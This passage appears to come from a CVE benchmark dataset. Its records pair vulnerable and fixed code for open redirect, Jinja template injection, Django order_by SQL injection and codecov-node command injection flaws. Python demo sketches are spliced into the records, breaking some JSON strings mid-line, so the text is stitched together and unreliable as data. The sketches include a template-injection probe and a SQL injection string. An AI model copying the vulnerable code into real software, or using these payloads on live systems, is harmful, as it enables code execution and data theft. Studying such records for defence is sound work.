NOTE: why checks name?\n+ api = flask.current_app.config[\"PYLOAD_API\"]\n+ user = session.get(\"name\")\n+ 
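The Open Forms record (CVE-2022-31040) above anchors redirect validation on Django's url_has_allowed_host_and_scheme() helper. A standalone sketch with a hypothetical host list; the CORS fallback from the real fix and the settings wiring are omitted here.

from django.utils.http import url_has_allowed_host_and_scheme

ALLOWED_HOSTS = ["forms.example.com"]  # stand-in for settings.ALLOWED_HOSTS

def allow_redirect_url(url: str) -> bool:
    return url_has_allowed_host_and_scheme(
        url=url,
        allowed_hosts=[host for host in ALLOWED_HOSTS if host != "*"],  # never trust "*"
        require_https=True,  # stand-in for settings.IS_HTTPS
    )

print(allow_redirect_url("https://forms.example.com/cookies"))      # True
print(allow_redirect_url("https://attacker.example.net/?phish=1"))  # False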
authenticated = session.get(\"authenticated\")\n+\n+ return authenticated and api.user_exists(user)\n\n--- /dev/null\n+++ b/src/pyload/webui/app/helpers.py\n@@ -0,0 +1,8 @@\n+ def user_exists(self, username):\n+ \"\"\"\n+ Check if a user actually exists in the database.\n+\n+ :param username:\n+ :return: boolean\n+ \"\"\"\n+ return self.pyload.db.user_exists(username)\n\n--- /dev/null\n+++ b/src/pyload/webui/app/helpers.py\n@@ -0,0 +1,4 @@\n+ @style.queue\n+ def user_exists(self, user):\n+ self.c.execute(\"SELECT name FROM users WHERE name=?\", (user,))\n+ return self.c.fetchone() is not None\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-3145", "cve_description": "An open redirect vulnerability exists in Okta OIDC Middleware prior to version 5.0.0 allowing an attacker to redirect a user to an arbitrary URL.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/okta/okta-oidc-middleware", "patch_url": ["https://github.com/okta/okta-oidc-middleware/commit/5d10b3ccdd5d6893de4d8b58696094267d30c113"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_212_1", "commit": "fe24bfc", "file_path": "src/oidcUtil.js", "start_line": 135, "end_line": 160, "snippet": "oidcUtil.ensureAuthenticated = (context, options = {}) => {\n return (req, res, next) => {\n const isAuthenticated = req.isAuthenticated && req.isAuthenticated();\n if (isAuthenticated) {\n return next();\n }\n const negotiator = new Negotiator(req);\n if (negotiator.mediaType() === 'text/html') {\n if (!isAuthenticated) {\n if (req.session) {\n req.session.returnTo = req.originalUrl || req.url;\n }\n let url = options.redirectTo;\n if (!url) {\n const loginPath = context.options.routes.login.path;\n url = (new URL(loginPath[0] === '/' ? `.${loginPath}` : `/${loginPath}`, context.options.appBaseUrl + '/')).href;\n }\n return res.redirect(appendOptionsToQuery(url, options));\n }\n\n next();\n } else {\n res.sendStatus(401);\n }\n };\n};"}], "fix_func": [{"id": "fix_js_212_1", "commit": "5d10b3ccdd5d6893de4d8b58696094267d30c113", "file_path": "src/oidcUtil.js", "start_line": 135, "end_line": 161, "snippet": "oidcUtil.ensureAuthenticated = (context, options = {}) => {\n return (req, res, next) => {\n const isAuthenticated = req.isAuthenticated && req.isAuthenticated();\n if (isAuthenticated) {\n return next();\n }\n const negotiator = new Negotiator(req);\n if (negotiator.mediaType() === 'text/html') {\n if (!isAuthenticated) {\n if (req.session) {\n // collapse any leading slashes to a single slash to prevent open redirects (OKTA-499372)\n req.session.returnTo = (req.originalUrl || req.url).replace(/^\\/+/, '/');\n }\n let url = options.redirectTo;\n if (!url) {\n const loginPath = context.options.routes.login.path;\n url = (new URL(loginPath[0] === '/' ? 
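The pyload record (CVE-2023-0227) above ties session validity to a live account lookup instead of trusting session fields alone. A minimal sketch of the same idea; the set below stands in for api.user_exists() querying the user database.

existing_users = {"admin", "alice"}  # stand-in for the users table

def is_authenticated(session: dict) -> bool:
    # Pre-fix behaviour trusted the session payload alone, so cookies minted
    # for a since-deleted account never expired.
    return bool(session.get("authenticated")) and session.get("name") in existing_users

session = {"name": "alice", "authenticated": True}
print(is_authenticated(session))  # True while the account exists
existing_users.discard("alice")   # account removed server-side
print(is_authenticated(session))  # False: the stale cookie is now worthless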
`.${loginPath}` : `/${loginPath}`, context.options.appBaseUrl + '/')).href;\n }\n return res.redirect(appendOptionsToQuery(url, options));\n }\n\n next();\n } else {\n res.sendStatus(401);\n }\n };\n};"}], "vul_patch": "--- a/src/oidcUtil.js\n+++ b/src/oidcUtil.js\n@@ -8,7 +8,8 @@\n if (negotiator.mediaType() === 'text/html') {\n if (!isAuthenticated) {\n if (req.session) {\n- req.session.returnTo = req.originalUrl || req.url;\n+ // collapse any leading slashes to a single slash to prevent open redirects (OKTA-499372)\n+ req.session.returnTo = (req.originalUrl || req.url).replace(/^\\/+/, '/');\n }\n let url = options.redirectTo;\n if (!url) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-6395", "cve_description": "The Mock software contains a vulnerability wherein an attacker could potentially exploit privilege escalation, enabling the execution of arbitrary code with root user privileges. This weakness stems from the absence of proper sandboxing during the expansion and execution of Jinja2 templates, which may be included in certain configuration parameters. While the Mock documentation advises treating users added to the mock group as privileged, certain build systems invoking mock on behalf of users might inadvertently permit less privileged users to define configuration tags. These tags could then be passed as parameters to mock during execution, potentially leading to the utilization of Jinja2 templates for remote privilege escalation and the execution of arbitrary code as the root user on the build server.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/xsuchy/templated-dictionary", "patch_url": ["https://github.com/xsuchy/templated-dictionary/commit/bcd90f0dafa365575c4b101e6f5d98c4ef4e4b69", "https://github.com/xsuchy/templated-dictionary/commit/0740bd0ca8d487301881541028977d120f8b8933"], "programing_language": "Python", "vul_func": [{"id": "vul_py_386_1", "commit": "11ecb712ac9c240ebda6c5c784023f3f22f5bd02", "file_path": "templated_dictionary/__init__.py", "start_line": 11, "end_line": 26, "snippet": " def __init__(self, *args, alias_spec=None, **kwargs):\n '''\n Use the object dict.\n\n Optional parameter 'alias_spec' is dictionary of form:\n {'aliased_to': ['alias_one', 'alias_two', ...], ...}\n When specified, and one of the aliases is accessed - the\n 'aliased_to' config option is returned.\n '''\n self.__dict__.update(*args, 
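The Okta middleware record (CVE-2022-3145) above collapses any run of leading slashes in returnTo to a single "/", because browsers treat "//host/..." as a protocol-relative absolute URL. The same one-liner transposed from JavaScript to Python:

import re

def safe_return_to(original_url: str) -> str:
    return re.sub(r"^/+", "/", original_url)  # mirrors .replace(/^\/+/, '/')

print(safe_return_to("//evil.example/login"))  # /evil.example/login -> same-origin path
print(safe_return_to("/profile"))              # /profile (already safe, unchanged)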
**kwargs)\n\n self._aliases = {}\n if alias_spec:\n for aliased_to, aliases in alias_spec.items():\n for alias in aliases:\n self._aliases[alias] = aliased_to"}, {"id": "vul_py_386_2", "commit": "11ecb712ac9c240ebda6c5c784023f3f22f5bd02", "file_path": "templated_dictionary/__init__.py", "start_line": 79, "end_line": 88, "snippet": " def __render_string(self, value):\n orig = last = value\n max_recursion = self.__dict__.get('jinja_max_recursion', 5)\n for _ in range(max_recursion):\n template = jinja2.Template(value, keep_trailing_newline=True)\n value = _to_native(template.render(self.__dict__))\n if value == last:\n return value\n last = value\n raise ValueError(\"too deep jinja re-evaluation on '{}'\".format(orig))"}], "fix_func": [{"id": "fix_py_386_1", "commit": "bcd90f0dafa365575c4b101e6f5d98c4ef4e4b69", "file_path": "templated_dictionary/__init__.py", "start_line": 11, "end_line": 28, "snippet": " def __init__(self, *args, alias_spec=None, **kwargs):\n '''\n Use the object dict.\n\n Optional parameter 'alias_spec' is dictionary of form:\n {'aliased_to': ['alias_one', 'alias_two', ...], ...}\n When specified, and one of the aliases is accessed - the\n 'aliased_to' config option is returned.\n '''\n self.__dict__.update(*args, **kwargs)\n\n self.sandbox = sandbox.SandboxedEnvironment(keep_trailing_newline=True)\n\n self._aliases = {}\n if alias_spec:\n for aliased_to, aliases in alias_spec.items():\n for alias in aliases:\n self._aliases[alias] = aliased_to"}, {"id": "fix_py_386_2", "commit": "bcd90f0dafa365575c4b101e6f5d98c4ef4e4b69", "file_path": "templated_dictionary/__init__.py", "start_line": 81, "end_line": 89, "snippet": " def __render_string(self, value):\n orig = last = value\n max_recursion = self.__dict__.get('jinja_max_recursion', 5)\n for _ in range(max_recursion):\n value = _to_native(self.sandbox.from_string(value).render(self.__dict__, func=lambda:None))\n if value == last:\n return value\n last = value\n raise ValueError(\"too deep jinja re-evaluation on '{}'\".format(orig))"}], "vul_patch": "--- a/templated_dictionary/__init__.py\n+++ b/templated_dictionary/__init__.py\n@@ -9,6 +9,8 @@\n '''\n self.__dict__.update(*args, **kwargs)\n \n+ self.sandbox = sandbox.SandboxedEnvironment(keep_trailing_newline=True)\n+\n self._aliases = {}\n if alias_spec:\n for aliased_to, aliases in alias_spec.items():\n\n--- a/templated_dictionary/__init__.py\n+++ b/templated_dictionary/__init__.py\n@@ -2,8 +2,7 @@\n orig = last = value\n max_recursion = self.__dict__.get('jinja_max_recursion', 5)\n for _ in range(max_recursion):\n- template = jinja2.Template(value, keep_trailing_newline=True)\n- value = _to_native(template.render(self.__dict__))\n+ value = _to_native(self.sandbox.from_string(value).render(self.__dict__, func=lambda:None))\n if value == last:\n return value\n last = value\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-35042", "cve_description": "Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
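The templated-dictionary record (CVE-2023-6395) above swaps bare jinja2.Template rendering for a SandboxedEnvironment. The payload below is the classic attribute-walking probe, shown only to confirm that the sandbox refuses what a plain environment happily evaluates.

from jinja2 import Template
from jinja2.sandbox import SandboxedEnvironment, SecurityError

probe = "{{ ''.__class__.__mro__ }}"

print(Template(probe).render())  # unsandboxed: introspection succeeds

try:
    SandboxedEnvironment(keep_trailing_newline=True).from_string(probe).render()
except SecurityError as exc:
    print("blocked:", exc)  # sandbox rejects underscore-attribute access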
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/0bd57a879a0d54920bb9038a732645fb917040e9", "https://github.com/django/django/commit/dae83a24519d6f284c74414e0b81d64d9b5a0db4", "https://github.com/django/django/commit/a34a5f724c5d5adb2109374ba3989ebb7b11f81f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_5_1", "commit": "8dc1cc0", "file_path": "django/db/models/sql/query.py", "start_line": 1888, "end_line": 1932, "snippet": " def add_ordering(self, *ordering):\n \"\"\"\n Add items from the 'ordering' sequence to the query's \"order by\"\n clause. These items are either field names (not column names) --\n possibly with a direction prefix ('-' or '?') -- or OrderBy\n expressions.\n\n If 'ordering' is empty, clear all ordering from the query.\n \"\"\"\n errors = []\n for item in ordering:\n if isinstance(item, str):\n if '.' in item:\n warnings.warn(\n 'Passing column raw column aliases to order_by() is '\n 'deprecated. Wrap %r in a RawSQL expression before '\n 'passing it to order_by().' % item,\n category=RemovedInDjango40Warning,\n stacklevel=3,\n )\n continue\n if item == '?':\n continue\n if item.startswith('-'):\n item = item[1:]\n if item in self.annotations:\n continue\n if self.extra and item in self.extra:\n continue\n # names_to_path() validates the lookup. A descriptive\n # FieldError will be raise if it's not.\n self.names_to_path(item.split(LOOKUP_SEP), self.model._meta)\n elif not hasattr(item, 'resolve_expression'):\n errors.append(item)\n if getattr(item, 'contains_aggregate', False):\n raise FieldError(\n 'Using an aggregate in order_by() without also including '\n 'it in annotate() is not allowed: %s' % item\n )\n if errors:\n raise FieldError('Invalid order_by arguments: %s' % errors)\n if ordering:\n self.order_by += ordering\n else:\n self.default_ordering = False"}], "fix_func": [{"id": "fix_py_5_1", "commit": "0bd57a879a0d54920bb9038a732645fb917040e9", "file_path": "django/db/models/sql/query.py", "start_line": 1890, "end_line": 1934, "snippet": " def add_ordering(self, *ordering):\n \"\"\"\n Add items from the 'ordering' sequence to the query's \"order by\"\n clause. These items are either field names (not column names) --\n possibly with a direction prefix ('-' or '?') -- or OrderBy\n expressions.\n\n If 'ordering' is empty, clear all ordering from the query.\n \"\"\"\n errors = []\n for item in ordering:\n if isinstance(item, str):\n if '.' in item and ORDER_PATTERN.match(item):\n warnings.warn(\n 'Passing column raw column aliases to order_by() is '\n 'deprecated. Wrap %r in a RawSQL expression before '\n 'passing it to order_by().' % item,\n category=RemovedInDjango40Warning,\n stacklevel=3,\n )\n continue\n if item == '?':\n continue\n if item.startswith('-'):\n item = item[1:]\n if item in self.annotations:\n continue\n if self.extra and item in self.extra:\n continue\n # names_to_path() validates the lookup. 
A descriptive\n # FieldError will be raise if it's not.\n self.names_to_path(item.split(LOOKUP_SEP), self.model._meta)\n elif not hasattr(item, 'resolve_expression'):\n errors.append(item)\n if getattr(item, 'contains_aggregate', False):\n raise FieldError(\n 'Using an aggregate in order_by() without also including '\n 'it in annotate() is not allowed: %s' % item\n )\n if errors:\n raise FieldError('Invalid order_by arguments: %s' % errors)\n if ordering:\n self.order_by += ordering\n else:\n self.default_ordering = False"}, {"id": "fix_py_5_2", "commit": "0bd57a879a0d54920bb9038a732645fb917040e9", "file_path": "django/db/models/sql/constants.py", "start_line": 22, "end_line": 22, "snippet": "ORDER_PATTERN = _lazy_re_compile(r'[-+]?[.\\w]+$')"}], "vul_patch": "--- a/django/db/models/sql/query.py\n+++ b/django/db/models/sql/query.py\n@@ -10,7 +10,7 @@\n errors = []\n for item in ordering:\n if isinstance(item, str):\n- if '.' in item:\n+ if '.' in item and ORDER_PATTERN.match(item):\n warnings.warn(\n 'Passing column raw column aliases to order_by() is '\n 'deprecated. Wrap %r in a RawSQL expression before '\n\n--- /dev/null\n+++ b/django/db/models/sql/query.py\n@@ -0,0 +1 @@\n+ORDER_PATTERN = _lazy_re_compile(r'[-+]?[.\\w]+$')\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-35042:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-35042/bin/python ./runtests.py queries.tests.QuerySetExceptionTests.test_order_by_escape_prevention\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-35042:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-35042/bin/python ./runtests.py queries.tests\n"} {"cve_id": "CVE-2020-7597", "cve_description": "codecov-node npm module before 3.6.5 allows remote attackers to execute arbitrary commands.The value provided as part of the gcov-root argument is executed by the exec function within lib/codecov.js. 
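The Django record (CVE-2021-35042) above re-validates dotted order_by() values against ORDER_PATTERN before the deprecation shim accepts them; previously any item containing "." skipped validation entirely. A standalone regex demo (re.compile stands in for Django's _lazy_re_compile; the injection string is illustrative).

import re

ORDER_PATTERN = re.compile(r"[-+]?[.\w]+$")

legitimate = "-table.column"                 # raw column alias, still permitted
malicious = "vote.id);select pg_sleep(5)--"  # dotted, so the old shim skipped checks

print(bool(ORDER_PATTERN.match(legitimate)))  # True: takes the deprecation path
print(bool(ORDER_PATTERN.match(malicious)))   # False: falls through to names_to_path()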
This vulnerability exists due to an incomplete fix of CVE-2020-7596.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/codecov/codecov-node", "patch_url": ["https://github.com/codecov/codecov-node/commit/02cf13d8b93ac547b5b4c2cfe186b7d874fd234f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_204_1", "commit": "bac0787", "file_path": "lib/codecov.js", "start_line": 239, "end_line": 557, "snippet": "var upload = function(args, on_success, on_failure) {\n // Build query\n var codecov_endpoint =\n args.options.url ||\n process.env.codecov_url ||\n process.env.CODECOV_URL ||\n 'https://codecov.io'\n var query = {}\n var debug = []\n var yamlFile =\n args.options.yml ||\n process.env.codecov_yml ||\n process.env.CODECOV_YML ||\n 'codecov.yml'\n\n console.log(\n '' +\n ' _____ _ \\n' +\n ' / ____| | | \\n' +\n '| | ___ __| | ___ ___ _____ __ \\n' +\n '| | / _ \\\\ / _` |/ _ \\\\/ __/ _ \\\\ \\\\ / / \\n' +\n '| |___| (_) | (_| | __/ (_| (_) \\\\ V / \\n' +\n ' \\\\_____\\\\___/ \\\\__,_|\\\\___|\\\\___\\\\___/ \\\\_/ \\n' +\n ' ' +\n version\n )\n\n if ((args.options.disable || '').split(',').indexOf('detect') === -1) {\n console.log('==> Detecting CI Provider')\n query = detectProvider()\n } else {\n debug.push('disabled detect')\n }\n\n query.yaml = [yamlFile, '.codecov.yml'].reduce(function(result, file) {\n return (\n result ||\n (fs.existsSync(path.resolve(process.cwd(), file))\n ? 
path.resolve(process.cwd(), file)\n : undefined)\n )\n }, undefined)\n\n if (args.options.build) {\n query.build = args.options.build\n }\n\n if (args.options.commit) {\n query.commit = args.options.commit\n }\n\n if (args.options.branch) {\n query.branch = args.options.branch\n }\n\n if (args.options.slug) {\n query.slug = args.options.slug\n }\n\n var flags =\n args.options.flags || process.env.codecov_flags || process.env.CODECOV_FLAGS\n if (flags) {\n query.flags = flags\n }\n\n var yamlToken\n try {\n var loadedYamlFile = jsYaml.safeLoad(fs.readFileSync(query.yaml, 'utf8'))\n yamlToken =\n loadedYamlFile && loadedYamlFile.codecov && loadedYamlFile.codecov.token\n } catch (e) {\n // silently fail\n }\n var token =\n args.options.token ||\n yamlToken ||\n process.env.codecov_token ||\n process.env.CODECOV_TOKEN\n if (token) {\n query.token = token\n }\n\n query.package = 'node-' + version\n\n console.log('==> Configuration: ')\n console.log(' Endpoint: ' + codecov_endpoint)\n // Don't output `query` directly as it contains the upload token\n console.log({\n commit: query.commit,\n branch: query.branch,\n package: query.package,\n })\n\n var upload = ''\n\n // Add specified env vars\n var env_found = false\n if (args.options.env || process.env.CODECOV_ENV || process.env.codecov_env) {\n var env = (\n args.options.env +\n ',' +\n (process.env.CODECOV_ENV || '') +\n ',' +\n (process.env.codecov_env || '')\n ).split(',')\n for (var i = env.length - 1; i >= 0; i--) {\n if (env[i]) {\n upload += env[i] + '=' + (process.env[env[i]] || '').toString() + '\\n'\n env_found = true\n }\n }\n if (env_found) {\n upload += '<<<<<< ENV\\n'\n }\n }\n\n // List git files\n var root = path.resolve(args.options.root || query.root || '.')\n console.log('==> Building file structure')\n try {\n upload +=\n execSync('git ls-files || hg locate', { cwd: root })\n .toString()\n .trim() + '\\n<<<<<< network\\n'\n } catch (err) {\n // not a git/hg dir, emulating git/hg ignore behavior\n upload +=\n walk\n .sync({ path: root, ignoreFiles: ['.gitignore', '.hgignore'] })\n .join('\\n')\n .trim() + '\\n<<<<<< network\\n'\n }\n // Make gcov reports\n if ((args.options.disable || '').split(',').indexOf('gcov') === -1) {\n try {\n console.log('==> Generating gcov reports (skip via --disable=gcov)')\n var gcg = args.options['gcov-glob'] || ''\n if (gcg) {\n if (!isWindows) {\n gcg = gcg\n .split(' ')\n .map(function(p) {\n return \"-not -path '\" + p + \"'\"\n })\n .join(' ')\n } else {\n gcg = gcg\n .split(' ')\n .map(function(p) {\n return '^| findstr /i /v ' + p\n })\n .join(' ')\n }\n }\n var gcov\n if (!isWindows) {\n gcov =\n 'find ' +\n (args.options['gcov-root'] || root) +\n \" -type f -name '*.gcno' \" +\n gcg +\n ' -exec ' +\n (validator.escape(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n (validator.escape(args.options['gcov-args']) || '') +\n ' {} +'\n } else {\n // @TODO support for root\n // not straight forward due to nature of windows command dir\n gcov =\n 'for /f \"delims=\" %g in (\\'dir /a-d /b /s *.gcno ' +\n gcg +\n \"') do \" +\n (args.options['gcov-exec'] || 'gcov') +\n ' ' +\n (args.options['gcov-args'] || '') +\n ' %g'\n }\n debug.push(gcov)\n console.log(' $ ' + gcov)\n execSync(gcov)\n } catch (e) {\n console.log(' Failed to run gcov command.')\n }\n } else {\n debug.push('disabled gcov')\n }\n\n // Detect .bowerrc\n var bowerrc\n if (!isWindows) {\n bowerrc = execSync('test -f .bowerrc && cat .bowerrc || echo \"\"', {\n cwd: root,\n })\n .toString()\n .trim()\n } else {\n bowerrc = 
execSync('if exist .bowerrc type .bowerrc', { cwd: root })\n .toString()\n .trim()\n }\n if (bowerrc) {\n bowerrc = JSON.parse(bowerrc).directory\n if (bowerrc) {\n if (!isWindows) {\n more_patterns =\n \" -not -path '*/\" + bowerrc.toString().replace(/\\/$/, '') + \"/*'\"\n } else {\n more_patterns =\n '| findstr /i /v \\\\' + bowerrc.toString().replace(/\\/$/, '') + '\\\\'\n }\n }\n }\n\n var files = [],\n file = null\n if (args.options.pipe) {\n // Append piped reports\n upload += '# path=piped\\n' + args.options.pipe.join('') + '\\n<<<<<< EOF\\n'\n console.log('==> Reading report from stdin')\n } else if (args.options.file) {\n // Append manually entered reports\n file = args.options.file\n console.log('==> Targeting specific file')\n try {\n upload +=\n '# path=' +\n file +\n '\\n' +\n fs.readFileSync(file, 'utf8').toString() +\n '\\n<<<<<< EOF\\n'\n console.log(' + ' + file)\n files.push(file)\n } catch (e) {\n debug.push('failed: ' + file.split('/').pop())\n console.log(' X Failed to read file at ' + file)\n }\n } else if ((args.options.disable || '').split(',').indexOf('search') === -1) {\n console.log('==> Scanning for reports')\n var _files\n if (!isWindows) {\n _files = execSync('find ' + root + ' ' + patterns + more_patterns)\n .toString()\n .trim()\n .split('\\n')\n } else {\n // @TODO support for a root directory\n // It's not straightforward due to the nature of the dir command\n _files = execSync('dir ' + patterns + more_patterns)\n .toString()\n .trim()\n .split('\\r\\n')\n }\n if (_files) {\n for (var i2 = _files.length - 1; i2 >= 0; i2--) {\n file = _files[i2]\n try {\n upload +=\n '# path=' +\n file +\n '\\n' +\n fs.readFileSync(file, 'utf8').toString() +\n '\\n<<<<<< EOF\\n'\n console.log(' + ' + file)\n files.push(file)\n } catch (e) {\n debug.push('failed: ' + file.split('/').pop())\n console.log(' X Failed to read file at ' + file)\n }\n }\n }\n } else {\n debug.push('disabled search')\n }\n\n if (files) {\n // Upload to Codecov\n if (args.options.dump) {\n console.log('-------- DEBUG START --------')\n console.log(upload)\n console.log('-------- DEBUG END --------')\n } else {\n console.log('==> Uploading reports')\n var _upload\n if ((args.options.disable || '').split(',').indexOf('s3') === -1) {\n _upload = sendToCodecovV3\n } else {\n _upload = sendToCodecovV2\n }\n _upload(\n codecov_endpoint,\n query,\n upload,\n function() {\n // remove files after Uploading\n if (args.options.clear) {\n for (var i = files.length - 1; i >= 0; i--) {\n try {\n fs.unlinkSync(files[i])\n } catch (e) {}\n }\n }\n if (on_success) {\n on_success.apply(this, arguments)\n }\n },\n on_failure || function() {}\n )\n }\n }\n\n return {\n body: upload,\n files: files,\n query: query,\n debug: debug,\n url: codecov_endpoint,\n }\n}"}], "fix_func": [{"id": "fix_js_204_1", "commit": "02cf13d", "file_path": "lib/codecov.js", "start_line": 238, "end_line": 556, "snippet": "var upload = function(args, on_success, on_failure) {\n // Build query\n var codecov_endpoint =\n args.options.url ||\n process.env.codecov_url ||\n process.env.CODECOV_URL ||\n 'https://codecov.io'\n var query = {}\n var debug = []\n var yamlFile =\n args.options.yml ||\n process.env.codecov_yml ||\n process.env.CODECOV_YML ||\n 'codecov.yml'\n\n console.log(\n '' +\n ' _____ _ \\n' +\n ' / ____| | | \\n' +\n '| | ___ __| | ___ ___ _____ __ \\n' +\n '| | / _ \\\\ / _` |/ _ \\\\/ __/ _ \\\\ \\\\ / / \\n' +\n '| |___| (_) | (_| | __/ (_| (_) \\\\ V / \\n' +\n ' \\\\_____\\\\___/ \\\\__,_|\\\\___|\\\\___\\\\___/ \\\\_/ \\n' 
+\n ' ' +\n version\n )\n\n if ((args.options.disable || '').split(',').indexOf('detect') === -1) {\n console.log('==> Detecting CI Provider')\n query = detectProvider()\n } else {\n debug.push('disabled detect')\n }\n\n query.yaml = [yamlFile, '.codecov.yml'].reduce(function(result, file) {\n return (\n result ||\n (fs.existsSync(path.resolve(process.cwd(), file))\n ? path.resolve(process.cwd(), file)\n : undefined)\n )\n }, undefined)\n\n if (args.options.build) {\n query.build = args.options.build\n }\n\n if (args.options.commit) {\n query.commit = args.options.commit\n }\n\n if (args.options.branch) {\n query.branch = args.options.branch\n }\n\n if (args.options.slug) {\n query.slug = args.options.slug\n }\n\n var flags =\n args.options.flags || process.env.codecov_flags || process.env.CODECOV_FLAGS\n if (flags) {\n query.flags = flags\n }\n\n var yamlToken\n try {\n var loadedYamlFile = jsYaml.safeLoad(fs.readFileSync(query.yaml, 'utf8'))\n yamlToken =\n loadedYamlFile && loadedYamlFile.codecov && loadedYamlFile.codecov.token\n } catch (e) {\n // silently fail\n }\n var token =\n args.options.token ||\n yamlToken ||\n process.env.codecov_token ||\n process.env.CODECOV_TOKEN\n if (token) {\n query.token = token\n }\n\n query.package = 'node-' + version\n\n console.log('==> Configuration: ')\n console.log(' Endpoint: ' + codecov_endpoint)\n // Don't output `query` directly as it contains the upload token\n console.log({\n commit: query.commit,\n branch: query.branch,\n package: query.package,\n })\n\n var upload = ''\n\n // Add specified env vars\n var env_found = false\n if (args.options.env || process.env.CODECOV_ENV || process.env.codecov_env) {\n var env = (\n args.options.env +\n ',' +\n (process.env.CODECOV_ENV || '') +\n ',' +\n (process.env.codecov_env || '')\n ).split(',')\n for (var i = env.length - 1; i >= 0; i--) {\n if (env[i]) {\n upload += env[i] + '=' + (process.env[env[i]] || '').toString() + '\\n'\n env_found = true\n }\n }\n if (env_found) {\n upload += '<<<<<< ENV\\n'\n }\n }\n\n // List git files\n var root = path.resolve(args.options.root || query.root || '.')\n console.log('==> Building file structure')\n try {\n upload +=\n execSync('git ls-files || hg locate', { cwd: root })\n .toString()\n .trim() + '\\n<<<<<< network\\n'\n } catch (err) {\n // not a git/hg dir, emulating git/hg ignore behavior\n upload +=\n walk\n .sync({ path: root, ignoreFiles: ['.gitignore', '.hgignore'] })\n .join('\\n')\n .trim() + '\\n<<<<<< network\\n'\n }\n // Make gcov reports\n if ((args.options.disable || '').split(',').indexOf('gcov') === -1) {\n try {\n console.log('==> Generating gcov reports (skip via --disable=gcov)')\n var gcg = args.options['gcov-glob'] || ''\n if (gcg) {\n if (!isWindows) {\n gcg = gcg\n .split(' ')\n .map(function(p) {\n return \"-not -path '\" + p + \"'\"\n })\n .join(' ')\n } else {\n gcg = gcg\n .split(' ')\n .map(function(p) {\n return '^| findstr /i /v ' + p\n })\n .join(' ')\n }\n }\n var gcov\n if (!isWindows) {\n gcov =\n 'find ' +\n (sanitizeVar(args.options['gcov-root']) || root) +\n \" -type f -name '*.gcno' \" +\n gcg +\n ' -exec ' +\n (sanitizeVar(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n (sanitizeVar(args.options['gcov-args']) || '') +\n ' {} +'\n } else {\n // @TODO support for root\n // not straight forward due to nature of windows command dir\n gcov =\n 'for /f \"delims=\" %g in (\\'dir /a-d /b /s *.gcno ' +\n gcg +\n \"') do \" +\n (sanitizeVar(args.options['gcov-exec']) || 'gcov') +\n ' ' +\n 
